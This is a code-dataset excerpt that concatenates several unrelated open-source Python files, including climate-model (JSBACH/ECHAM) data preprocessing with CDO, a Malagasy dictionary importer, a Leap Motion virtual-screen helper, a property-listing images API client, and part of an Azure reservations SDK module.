outfile = get_temporary_directory() + self.experiment + '_jsbach_surf_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_surf.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_surf_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_surf_stream())) > 0: # check if input files existing at all
print glob.glob(self._get_filenames_surf_stream())
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_surf_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'surf': outfile})
# ECHAM BOT stream
print ' BOT stream ...'
outfile = get_temporary_directory() + self.experiment + '_echam6_echam_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_echam6_echam.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_echam6_echam_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_echam_BOT())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_echam_BOT())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'echam': outfile})
# ALBEDO file
# albedo files as preprocessed by a script of Thomas
print ' ALBEDO VIS stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_VIS_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_VIS())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_VIS())
self.files.update({'albedo_vis': outfile})
print ' ALBEDO NIR stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_NIR_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_NIR())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_NIR())
self.files.update({'albedo_nir': outfile})
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
This routine uses the definitions of the routines how to
read upward and downward fluxes
"""
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#~ tmpdict = copy.deepcopy(kwargs)
#~ print self.dic_vars
routine_up = self.dic_vars['surface_upward_flux']
routine_down = self.dic_vars['sis']
#sw_down = self.get_surface_shortwave_radiation_down(interval=interval, **kwargs)
cmd = 'sw_down = self.' + routine_down
exec(cmd)
#sw_up = self.get_surface_shortwave_radiation_up(interval=interval, **kwargs)
cmd = 'sw_up = self.' + routine_up
exec(cmd)
# climatological mean
alb = sw_up[0].div(sw_down[0])
alb.label = self.experiment + ' albedo'
alb.unit = '-'
# original data
alb_org = sw_up[1][2].div(sw_down[1][2])
alb_org.label = self.experiment + ' albedo'
alb_org.unit = '-'
retval = (alb_org.time, alb_org.fldmean(), alb_org)
return alb, retval
def get_albedo_data_vis(self, interval='season', **kwargs):
"""
This routine retrieves the JSBACH albedo information for VIS
it requires a preprocessing with a script that aggregates from tile
to box values!
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_vis'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_albedo_data_nir(self, interval='season', **kwargs):
"""
This routine retrieves the JSBACH albedo information for VIS
it requires a preprocessing with a script that aggregates from tile
to box values!
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_nir'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_temperature_2m(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_jsbach_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
return None
print self.type
print kwargs
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitely specified in either the config file or the dictionaries
varname = locdict.pop('variable')
units = locdict.pop('unit', 'Unit not specified')
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
#model_suffix = locdict.pop('model_suffix')
#model_prefix = locdict.pop('model_prefix')
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if self.type != 'JSBACH_RAW2':
print self.type
raise ValueError('Invalid data format here!')
# define from which stream of JSBACH data needs to be taken for specific variables
if varname in ['swdown_acc', 'swdown_reflect_acc']:
filename1 = self.files['jsbach']
elif varname in ['precip_acc']:
filename1 = self.files['land']
elif varname in ['temp2']:
filename1 = self.files['echam']
elif varname in ['var14']: # albedo vis
filename1 = self.files['albedo_vis']
elif varname in ['var15']: # albedo NIR
filename1 = self.files['albedo_nir']
else:
print varname
raise ValueError('Unknown variable type for JSBACH_RAW2 processing!')
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing! ')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
#ensure that climatology always starts with J anuary, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
class JSBACH_SPECIAL(JSBACH_RAW2):
"""
special class for more flexible reading of JSBACH input data
it allows to specify the input format and the directory of the input data
in case that you use a different setup, it is probably easiest to
just copy this class and make the required adaptations.
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='nc', raw_outdata='', **kwargs):
super(JSBACH_SPECIAL, self).__init__(filename, dic_variables, experiment, name=name, shift_lon=shift_lon, model_dict=model_dict, input_format=input_format, raw_outdata=raw_outdata, **kwargs)
class xxxxxxxxJSBACH_RAW(Model):
"""
Class for RAW JSBACH model output
works on manually preprocessed already concatenated data
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, intervals='monthly', **kwargs):
super(JSBACH_RAW, self).__init__(filename, dic_variables, name=name, intervals=intervals, **kwargs)
print('WARNING: This model class should be depreciated as it contained a lot of hardcoded dependencies and is only intermediate')
#TODO: depreciate this class
stop
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_RAW'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_temperature_2m(self, interval='monthly', **kwargs):
"""
get surface temperature (2m) from JSBACH model results
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'temp2'
rawfile = self.data_dir + self.experiment + '_echam6_echam_' + variable + '_ALL.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
def get_albedo_data(self, interval='monthly', **kwargs):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
"""
# read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon) # TODO make this more flexible
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
Fd = self.get_surface_shortwave_radiation_down(**kwargs)
Fu = self.get_surface_shortwave_radiation_up(**kwargs)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
if Fu_i is None:
return None
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
if Fd_i is None:
return None
lab = Fu_i.label
# albedo for chosen interval as caluclated as ratio of means of fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
#-----------------------------------------------------------------------
def _do_preprocessing(self, rawfile, varname, s_start_time, s_stop_time, interval='monthly', force_calc=False, valid_mask='global', target_grid='t63grid'):
"""
perform preprocessing
* selection of variable
* temporal subsetting
"""
cdo = Cdo()
if not os.path.exists(rawfile):
print('File not existing! %s ' % rawfile)
return None, None
# calculate monthly means
file_monthly = get_temporary_directory() + os.sep + os.path.basename(rawfile[:-3]) + '_' + varname + '_' + s_start_time + '_' + s_stop_time + '_mm.nc'
if (force_calc) or (not os.path.exists(file_monthly)):
cdo.monmean(options='-f nc', output=file_monthly, input='-seldate,' + s_start_time + ',' + s_stop_time + ' ' + '-selvar,' + varname + ' ' + rawfile, force=force_calc)
else:
pass
if not os.path.exists(file_monthly):
raise ValueError('Monthly preprocessing did not work! %s ' % file_monthly)
# calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
# read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.name, shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.name + ' std', unit='-', shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.name + ' std', shift_lon=False, lat_name='lat', lon_name='lon')
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.name, shift_lon=False, time_cycle=12, lat_name='lat', lon_name='lon')
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degree S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
"""
get surface shortwave incoming radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
mdata, retval = self._do_preprocessing(rawfile, 'swdown_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
"""
get surface shortwave upward radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO: move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
mdata, retval = self._do_preprocessing(rawfile, 'swdown_reflect_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_model_data_generic(self, interval='monthly', **kwargs):
"""
This is only a wrapper to redirect to individual functions
for the JSBACH_RAW class
Currently only the usage for rainfall is supported!
"""
# HACK: only a wrapper, should be depreciated
raise ValueError('Rainfall analysis not working yet!')
self.get_rainfall_data(interval=interval, **kwargs)
def get_rainfall_data(self, interval='monthly', **kwargs):
"""
get surface rainfall data for JSBACH
uses already preprocessed data where the convective and
advective rainfall has been merged
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO : move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'aprc'
rawfile = self.data_dir + self.experiment + '_echam6_echam_*_precipitation.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_gpp_data(self, interval='season'):
"""
get surface GPP data for JSBACH
todo temporal aggregation of data --> or leave it to the user!
"""
cdo = Cdo()
v = 'var167'
y1 = str(self.start_time)[0:10]
y2 = str(self.stop_time)[0:10]
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_' + y1[0:4] + '-' + y2[0:4] + '.nc'
times_in_file = int(''.join(cdo.ntime(input=rawfilename)))
if interval == 'season':
if times_in_file != 4:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.yseasmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_yseasmean.nc')
rawfilename = tmp_file[:-3] + '_yseasmean.nc'
if interval == 'monthly':
if times_in_file != 12:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.ymonmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_ymonmean.nc')
rawfilename = tmp_file[:-3] + '_ymonmean.nc'
if not os.path.exists(rawfilename):
return None
filename = rawfilename
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SW up data
gpp = Data4D(filename, v, read=True,
label=self.experiment + ' ' + v, unit='gC m-2 a-1', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, scale_factor=3600. * 24. * 30. / 0.083
)
return gpp.sum_data4D()
#-----------------------------------------------------------------------
| pygeo/pycmbs | pycmbs/benchmarking/models/mpi_esm.py | Python | mit | 41,720 |
from threading import Lock
import requests
from api.decorator import critical_section
from api.importer import AdditionalDataImporter
from api.importer import AdditionalDataImporterError
from api.importer.wiktionary import dyn_backend
rmi_lock = Lock()
class DictionaryImporter(AdditionalDataImporter):
def populate_cache(self, language):
rq_params = {
'language': 'eq.' + language
}
response = requests.get(dyn_backend.backend + '/word', rq_params)
query = response.json()
for json in query:
self.word_id_cache[(json['word'], json['language'])] = json['id']
class TenyMalagasyImporter(DictionaryImporter):
data_type = 'tenymalagasy/definition'
class RakibolanaMalagasyImporter(DictionaryImporter):
data_type = 'rakibolana/definition'
@critical_section(rmi_lock)
def write_tif(self, title, language, additional_data):
temp = self.data_type
self.data_type = 'rakibolana/derived'
try:
self.write_additional_data(title, language, additional_data)
except AdditionalDataImporterError as exc:
pass
self.data_type = temp
@critical_section(rmi_lock)
def write_raw(self, title, language, additional_data):
temp = self.data_type
self.data_type = 'rakibolana/raw'
try:
self.write_additional_data(title, language, additional_data)
except AdditionalDataImporterError as exc:
pass
self.data_type = temp
def get_data(self, template_title: str, wikipage: str, language: str):
pass
| radomd92/botjagwar | api/importer/rakibolanamalagasy.py | Python | mit | 1,609 |
import math
class VirtualScreen: #cet ecran est normal a l'axe Z du Leap
def __init__(self,Xoffset=0,Yoffset=50,Zoffset=-50,Zlimit=220,length=350,height=300): #en mm
self.Xoffset = Xoffset; # position du milieu du bord bas de l'ecran par rapport au centre du Leap
self.Yoffset = Yoffset; # position du milieu du bord bas de l'ecran par rapport au centre du Leap
self.Zoffset = Zoffset; # position du milieu du bord bas de l'ecran par rapport au centre du Leap
self.Zlimit = Zlimit # profondeur de la zone
self.length = length;
self.height = height;
self.UpperLeftCorner = [Xoffset-length/float(2),Yoffset+height]
self.Center = [self.Xoffset,self.Yoffset+0.5*self.height,Zoffset+0.5*Zlimit]
self.zoneUpperLeftCornerArray = [];
self.zoneHeight = height / float(2);
self.zoneLength = length / float(3);
for i in range(0,2):
for j in range(0,3):
self.zoneUpperLeftCornerArray.append([self.UpperLeftCorner[0]+self.zoneLength*j,self.UpperLeftCorner[1]-self.zoneHeight*i])
# print self.zoneUpperLeftCornerArray
def distanceFromScreen(self,position):
dX = max( max( position[0] - (self.Xoffset+self.length/float(2)), 0 ) , max (self.Xoffset-self.length/float(2) - position[0], 0 ) )
dY = max( max( position[1] - (self.Yoffset+self.height) , 0 ) , max (self.Yoffset - position[1], 0 ) )
dZ = max( max(self.Zoffset - position[2], 0 ) , max(position[2] - (self.Zlimit + self.Zoffset) , 0 ) )
return math.sqrt(dX**2+dY**2+dZ**2)
def isFacingTheScreen(self,position): #donner un vecteur position 3d en mm suivant les axes du Leapmotion ([x,y,z])
isXvalid = (position[0] <= self.Xoffset+self.length/float(2)) and (position[0] >= self.Xoffset-self.length/float(2))
isYvalid = (position[1] <= self.Yoffset+self.height) and (position[1] >= self.Yoffset)
isZvalid = (position[2] >= self.Zoffset) and (position[2] <= self.Zlimit + self.Zoffset)
return isXvalid and isYvalid and isZvalid
def getScreenZonePointedAt(self,position,direction):
if not self.isFacingTheScreen(position):
return -1
else:
lambdaIntersection = (self.Zoffset-position[2])/direction[2] # (Zoffset-Zpoint)/Zdirecteur
xIntersection = position[0] + lambdaIntersection*direction[0] # Xpoint + lambda * Xdirecteur
yIntersection = position[1] + lambdaIntersection*direction[1] # Ypoint + lambda * Ydirecteur
intersection = [xIntersection,yIntersection]
return(self.getScreenZoneFromPointOnScreen(intersection))
def getScreenZoneFromPointOnScreen(self,onScreenPosition):
for index,i in enumerate(self.zoneUpperLeftCornerArray):
if(onScreenPosition[0]>=i[0] and onScreenPosition[0]<i[0]+self.zoneLength and onScreenPosition[1]<=i[1] and onScreenPosition[1]>=i[1]-self.zoneHeight):
return index+1
return -1
| IIazertyuiopII/PDS_sonification | python/VirtualScreen.py | Python | mit | 2,759 |
from rewpapi.common.http import Request
from rewpapi.listings.listing import ListingResidential
class RemoteListingImages(Request):
def __init__(self, base_site, auth, listing_type, listing_uuid):
super(RemoteListingImages, self).__init__(auth)
self._base_site = base_site
self._auth = auth
self._listing_type = listing_type
self._listing_uuid = listing_uuid
self._endpoint = base_site + "/api/listings/%s/%s/images/" % (
listing_type, listing_uuid)
def get_all(self):
"""
Returns a list of Listing images
"""
remote_listing_images = self.execute()
listing_images = []
if remote_listing_images:
for a in remote_listing_images:
new_listing_images = ListingImages(self._base_site, self._auth,
self._listing_type, self._listing_uuid)
new_listing_images.FIELDS = []
for k, v in a.items():
setattr(new_listing_images, k, v)
new_listing_images.FIELDS.append(k)
listing_images.append(new_listing_images)
return listing_images
return None
def get(self, uuid):
"""
Returns a single ListingImage instance, matching uuid.
Raises a DoesNotExist exception if the object does not exist.
"""
b = ListingResidential()
b.branch_name = "Foo"
return b
class ListingImages(RemoteListingImages):
"""
A ListingImages object represents a Listing's images. Once instantiated,
you can:
- Change its values and send an update()
- Create it if it doesn't exist
"""
def set_fields(self, images):
self.images = images
def update(self):
"""
Update this listing's images.
"""
self._endpoint = self._base_site + "/api/listings/%s/%s/images/" % (
self._listing_type, self._listing_uuid)
images = []
for image in self.images:
image_dict = {}
image_dict['image'] = image.image
image_dict['caption'] = image.caption
image_dict['sha1'] = image.sha1
images.append(image_dict)
self.execute("PUT", images)
| propdata/rewp-api | rewpapi/listings/images.py | Python | mit | 2,288 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class CalculateExchangeOperations:
"""CalculateExchangeOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.reservations.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _post_initial(
self,
body: "_models.CalculateExchangeRequest",
**kwargs: Any
) -> Optional["_models.CalculateExchangeOperationResultResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.CalculateExchangeOperationResultResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._post_initial.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'CalculateExchangeRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CalculateExchangeOperationResultResponse', pipeline_response)
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
